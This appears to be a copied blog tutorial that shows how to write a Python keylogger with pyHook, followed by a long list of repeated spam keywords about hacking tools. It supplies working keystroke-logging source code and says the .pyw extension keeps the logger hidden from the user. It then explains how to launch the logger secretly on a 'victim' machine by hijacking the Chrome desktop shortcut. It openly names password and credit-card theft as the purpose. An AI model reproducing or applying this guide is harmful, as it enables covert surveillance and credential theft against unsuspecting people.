How To Make A Simple And Powerful Keylogger Using Python
Posted by Sykes
A keylogger is a computer program which can be written using any computer programming language such as c++ when you install it on a Victim system it can keep the records of every keystroke in a text file. Keylogger is mainly used to steal confidential data such as passwords, credit card numbers etc.
How to make a python keylogger?
A keylogger can be programmed using any programming language such as c++, java, c# e.tc. For this tutorial, I will use python to make a keylogger, because python is flexible, powerful and simple to understand even a non-programmer can use python to make a keylogger.
![](https://i0.wp.com/i.ytimg.com/vi/x8GbWt56TlY/maxresdefault.jpg?resize=1280%2C720&ssl=1)
Requirements to create a python keylogger
- Computer With Operating system: Windows, Mac os or Linux
- Python must be installed on the system
- Pip (Python index package ) you will need this to install python software packages.
- Pypiwin32 and PyHook packages
- Basic understanding of computers
You will learn to install these things one by one. If you have already installed and configured the python development kit feel free to skip Part 1.
Part 1: Downloading Python and pip, setting up the environment to create the keylogger.Step 1:
Download python development kit by clicking here.
![](https://i0.wp.com/geekviews.tech/wp-content/uploads/2017/02/python1.png?resize=696%2C318&ssl=1)
Choose python 2.7 because I am using this version. It is ok if you have a different version of python this method will work on every version of python.
Step 2:
Installation of python is pretty simple.Open the python setup file, Mark the checkboxes Very important else you have to set the python path manually, and click on Install Now.
![](https://i0.wp.com/geekviews.tech/wp-content/uploads/2017/02/pyhton2.png?w=664&ssl=1)
Step 3:
You need Pypiwin32 and PyHook python packages to create python keylogger. To install these packages you need pip, you can install Pypiwin32 and PyHook without using pip which is not recommended.
To download pip go to https://pip.pypa.io/en/stable/installing/ and Save link as by right clicking on get-pip.py. when the download is done, just run the get-pip.py file.
![](https://i0.wp.com/geekviews.tech/wp-content/uploads/2017/02/python3-1.png?resize=696%2C322&ssl=1)
Now you need to set the Variable path for pip to do this right click on the computer icon and choose properties.
![](https://i1.wp.com/geekviews.tech/wp-content/uploads/2017/02/python4.png?w=579&ssl=1)
Now click on the Advanced system settings
![](https://i1.wp.com/geekviews.tech/wp-content/uploads/2017/02/python5.png?resize=696%2C327&ssl=1)
Choose Environment Variables.
![](https://i2.wp.com/geekviews.tech/wp-content/uploads/2017/02/python6.png?w=390&ssl=1)
Choose New, Set the Variable name: PATH and Variable value as C:\Python27\Scripts
Click on ok.
![](https://i2.wp.com/geekviews.tech/wp-content/uploads/2017/02/python7.png?w=645&ssl=1)
Part 2: Installing Pypiwin32 and PyHook python Packages using pip:
Open Command Prompt(CMD) and type: pip installs Pypiwin32 press the Enter Key, wait for the installation to complete. After the Pypiwin32 package installation type: pip install PyHook press the Enter Key and wait for the installation to complete.When done close the Command Prompt.
![](https://i1.wp.com/geekviews.tech/wp-content/uploads/2017/02/python9.png?resize=696%2C364&ssl=1)
Part 3: Creating and testing the python keylogger:
Now you have configured your environment and installed all the necessary packages, let's start creating the keylogger. Click on the start menu and scroll down until you find Python 2.7, run python IDLE(GUI) by clicking on it.
![](https://i2.wp.com/geekviews.tech/wp-content/uploads/2017/02/python8.png?resize=670%2C420&ssl=1)
Go to the File, from the drop-down menu choose New file.
![](https://i1.wp.com/geekviews.tech/wp-content/uploads/2017/02/python10.png?resize=696%2C479&ssl=1)
Python Keylogger source code:
Copy these lines of code and paste into the new file. Modify the directory in the second line of code to your own location e.g 'C:\test\log.txt' this will create a folder named test in C save the log.txt file there when the Keylogger start.
import pyHook, pythoncom, sys, loggingfile_log='F:\\test\\log.txt'def onKeyboardEvent(event):
logging.basicConfig(filename=file_log,level=logging.DEBUG,format='%(message)s')
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return Truehooks_manager=pyHook.HookManager()hooks_manager.KeyDown=onKeyboardEventhooks_manager.HookKeyboard()pythoncom.PumpMessages()
Save your file as a test.pyw at any location you want, the .pyw extension is very important because of it the python keylogger will run in the background without notifying the user.
![](https://i0.wp.com/geekviews.tech/wp-content/uploads/2017/02/python11.png?w=557&ssl=1)
The Python Keylogger is now completed you can test it out by opening it and typing some text in your browser, go to the log.txt file which is in the F:\test\log.txt on my PC. You will find your log.txt file in C:\test\log.txt.But what if you want to test it on someone else computer? you want to run it without the user knowing that it has been launched, this can be done by attaching it to the program that the victim always uses such as Google Chrome.
Let's make the python keylogger auto-launchable by attaching it the Google Chrome.
Copy the following code and paste into notepad. Save it by giving .bat extension e.g launch.bat in a hidden location, e.g c:\test\launch.bat
Now right click on the google chrome desktop shortcut icon and click on properties. You will see a field called Target. Change the target field to the batch file launch.bat directory that you created. let's say you have saved your launch.bat file in a test folder in C, Then change the target field with "C:\test\launch.bat". Now, whenever the user opens chrome the keylogger will run automatically.
![](https://i0.wp.com/geekviews.tech/wp-content/uploads/2017/02/python12.png?w=360&ssl=1)
More information
- Pentest Tools For Mac
- New Hacker Tools
- Hacks And Tools
- Best Hacking Tools 2020
- Hacking Tools Usb
- Hack App
- How To Make Hacking Tools
- Hack Tools
- Pentest Tools For Android
- What Are Hacking Tools
- Tools Used For Hacking
- Tools Used For Hacking
- Hack Tools Download
- Hacker Search Tools
- Hacker Tools 2020
- Pentest Tools Subdomain
- Hacker Tools Apk Download
- Pentest Recon Tools
- Pentest Box Tools Download
- Hack Tools For Ubuntu
- Pentest Recon Tools
- Hacker Tools For Windows
- Hacking Tools
- Hacker Tools Free
- Hacking Tools Windows 10
- Hack Tool Apk No Root
- Hacking Tools And Software
- Hacker Tools 2019
- Hacking App
- Black Hat Hacker Tools
- Hacking Tools For Windows
- Termux Hacking Tools 2019
- Hacks And Tools
- Hack Tools Pc
- Hackers Toolbox
- Pentest Tools Review
- Hack Tools
- Usb Pentest Tools
- Nsa Hacker Tools
- Hacker Tools 2020
- Hacking Tools Hardware
- Hacker Tools Apk Download
- Hack Tools Github
- How To Hack
- Black Hat Hacker Tools
- Hack Apps
- Pentest Tools Free
- Pentest Tools For Windows
- Hack Tools Mac
- Wifi Hacker Tools For Windows
- Pentest Tools For Mac
- World No 1 Hacker Software
- Hacker Search Tools
- Pentest Reporting Tools
- Hacking Tools Usb
- Hacking Tools For Windows Free Download
- Hacking Tools For Pc
- Black Hat Hacker Tools
- Computer Hacker
- Hacker Search Tools
- Hacking Tools For Beginners
- Hacker Tools Online
- Hacking Tools For Mac
- Hack Tools Online
- Hacking Apps
- Hacking Tools For Games
- Hacking Tools Hardware
- Top Pentest Tools
- Hacker Tools 2020
- How To Make Hacking Tools
- Hack Tools Github
- Hacker Hardware Tools
- How To Install Pentest Tools In Ubuntu
- Pentest Tools Linux
- How To Make Hacking Tools
- Pentest Tools Find Subdomains
- What Is Hacking Tools
- Pentest Tools For Android
- What Is Hacking Tools
- Hack Tools Pc
- Hack Tools
- Hacking Tools For Windows
- Best Pentesting Tools 2018
- Hack App
- Pentest Tools Framework
- Pentest Tools For Android
- Hack Tools For Ubuntu
- Pentest Tools Open Source
- Hacking Tools Github
- Hackrf Tools
- Hacker Tools
- Nsa Hack Tools Download
- Hackrf Tools
- Hacker Tools
- Pentest Tools For Mac
- Hacker
- Easy Hack Tools
- Hack Tools For Windows
- Hak5 Tools
- Hacking Tools For Kali Linux
- Pentest Tools Bluekeep
- Hacking Tools For Windows Free Download
- Game Hacking
- Bluetooth Hacking Tools Kali
- Pentest Tools Bluekeep
- Android Hack Tools Github
- Pentest Tools Github
- Ethical Hacker Tools
- Game Hacking
- Hacking Tools For Windows 7
- Hak5 Tools
- Pentest Tools Windows
- Hacking Tools Online
- Pentest Tools Port Scanner
- Hacking Tools For Windows 7
- Hacking Tools Windows
- Hack App
- Pentest Tools For Ubuntu
- Pentest Tools Online
- Hack Tools Github
- Hacking Tools Mac
- Pentest Tools Bluekeep
- Hacker Tools For Ios
- Physical Pentest Tools
- Hacking Tools Windows 10
- Pentest Tools For Mac
- Pentest Tools Kali Linux
- Hack Tools Online
- Hacker Tools
- Hacking App
- Growth Hacker Tools
- Pentest Box Tools Download
- How To Make Hacking Tools
- Hacker Tools Software
- Hack Tools For Pc
- Beginner Hacker Tools
- Hacker Tools Github
- Github Hacking Tools
- Pentest Tools Github
- Hacking Tools For Mac
- Pentest Tools Github
- Termux Hacking Tools 2019
- Pentest Tools List
- Hack Tools Github
- Hacking Tools Name
- Pentest Tools For Android
- Hacker Tools Apk
- Pentest Tools Bluekeep
- Pentest Tools Apk
- New Hack Tools
- Hackers Toolbox
- Hak5 Tools
- Pentest Tools Android
- Hacker Security Tools
- Hacker Techniques Tools And Incident Handling
- Pentest Tools For Windows
- Github Hacking Tools